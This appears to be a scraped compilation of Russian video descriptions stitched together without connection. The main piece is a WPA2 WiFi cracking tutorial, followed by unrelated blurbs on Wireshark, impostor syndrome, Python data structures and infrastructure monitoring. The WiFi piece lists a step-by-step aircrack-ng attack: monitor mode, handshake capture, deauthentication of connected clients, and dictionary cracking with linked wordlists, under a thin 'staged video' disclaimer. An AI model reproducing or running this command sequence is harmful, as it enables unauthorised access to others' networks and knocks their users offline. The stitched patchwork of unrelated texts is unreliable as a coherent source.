Скачиваем образ системы с официального сайта, а также важное дополнение. Записываем образ на USB флешку, подготавливаем флешку с дополнениями (микропрограммами).
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…
t.me/Pulsechanel — канал Telegram, только там дополнительные и эксклюзивные материалы, а также текстовые материалы к видео. (https://tlgg.ru/Pulsechanel — альтернативная ссылка) hacker-basement.ru/ — наш сайт. Можно почитать статьи, скачать программы из видео и различную обучающую литературу.
Продолжаем обсуждать тему захвата и анализа трафика. В этом видео обзор утилиты Wireshark. Ознакомимся с интерфейсом, настройкой и принципом работы Wireshark. Научимся расшифровывать, перехватывать и анализировать трафик в беспроводных сетях.
Считается, что синдром самозванца есть у 70% всех людей, и даже Альберт Эйнштейн был ему подвержен. Это довольно неприятное состояние, которое может причинять дискомфорт. Чтобы было легче, важно уметь его хотя бы у себя его замечать, а еще лучше — пытаться побороть.
Курс, о котором идет речь в видео: C#/.NET — bit.ly/3dlyPv3
0:00 – вступление
0:23 — что такое синдром самозванца
1:26 – как определить у себя синдром самозванца
3:16 – рекламная пауза
4:22 – гендерные особенности
6:58 – причины возникновения, кто страдает
8:58 – как проявляется синдром самозванца
13:23 – как влияет корпоративная культура
14:50 – как бороться с синдромом
Сложные структуры данных часто возникают в проектах, реализующих сбор и обработку разносортных данных, как правило это многоуровневые вложенные массивы и словари. Работать с такими структурами непросто, но в Python есть отличные встроенные инструменты, позволяющие снизить сложность работы, улучшить читаемость и поддерживаемость кода, облегчить разработку в IDE, а также снизить объём используемой оперативной памяти. В видео мы поговорим о разных подходах и сравним их эффективность — List/Dict, dataclass, tuple, collections.namedtuple, typing.NamedTuple.
Меня зовут Алексей Голобурдин, я программирую с 2004 года и на этом канале делюсь своим опытом. Я основатель и руководитель компаний:
— Диджитализируй digitalize.team, разрабатываем сложные IT системы для бизнеса;
— Salesbeat salesbeat.pro, комплексный модуль доставки для интернет магазинов.
Если у вас есть проект на разработку, пишите нам на hi@digitalize.team.
С другими предложениями, а также если вам нужна одна или несколько индивидуальных консультаций/уроков по разработке (3000 руб/час), пишите мне на alexey@salesbeat.pro.
Вне зависимости от размера инфраструктуры, весьма сложно разобраться в проблемах, обнаруженных системой мониторинга, особенно если их сотни или тысячи. Они могут быть о железе, приложениях, связаны с безопасностью, тестовыми и продакшн средами, различными датацентрами и сервисами. Как эффективно управлять этой сложностью?